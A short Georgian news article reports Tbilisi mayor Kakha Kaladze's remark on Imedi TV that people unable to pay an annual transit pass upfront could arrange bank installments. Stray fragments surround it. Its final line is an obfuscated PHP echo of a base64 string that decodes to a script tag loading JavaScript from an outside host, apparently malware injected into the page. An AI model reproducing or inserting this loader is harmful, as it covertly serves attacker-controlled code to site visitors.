celsiusi
ავერსი საქკაბელი
თბილისის მერი კახა კალაძე აცხადებს, რომ შესაძლებელია, ის ადამიანები, რომლებიც საზოგადოებრივი ტრანსპორტის აბონემენტის შეძენას ერთჯერადად ვერ ახერხებენ, „ბანკებს დაელაპარაკონ“.
 
23 დეკემბერს „იმედის“ ეთერში, გადაცემა „იმედი Live“-ის ეთერში წამყვანებმა კახა კალაძეს დაუსვეს კითხვა სატარიფო ცვლილებებთან დაკავშირებით და მაგალითად მოუყვანეს პარლამენტარ ალეკო ელისაშვილის განცხადება, რომელმაც თქვა, რომ მასაც კი გაუჭირდება ერთჯერადად წლიური აბონემენტის თანხის გადახდა.
 
ამაზე პასუხად მერმა განაცხადა, რომ მისი ხარჯების დათვლა მარტივად შეიძლება: პარლამენტარის სტანდარტული ხელფასი არის დაახლეობით 3600 ლარი, რაც 12 თვეზე გამოდის 43 200 ლარი, ხოლო წლიურ აბონემენტზე „250 ლარზეა საუბარი“.
 
„თუმცა აქაც შეიძლება, დაელაპარაკონ ბანკებს და განწილდება [თანხის გადანაწილება – ყოველთვიურად გარკვეული ოდენობის გადახდა ერთჯერადი გადახდის ნაცვლად] გაუკეთონ, რავიცი, ეგრეც არ მგონია, პრობლემა იყოს, ხომ? მთავარი რა არის – ყველა იმ ოჯახისთვის, ყველა იმ ადამიანისთვის, ვისაც ყველაზე მეტად უჭირს, მგზავრობა არის უფასო ან იხიდიან 10 ან 20 თეთრს. ეს არის ჩემთვის ყველაზე მთავარი, პრინციპული და მნიშვნელოვანი“, – განაცხადა თბილისის მერმა.
1021
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");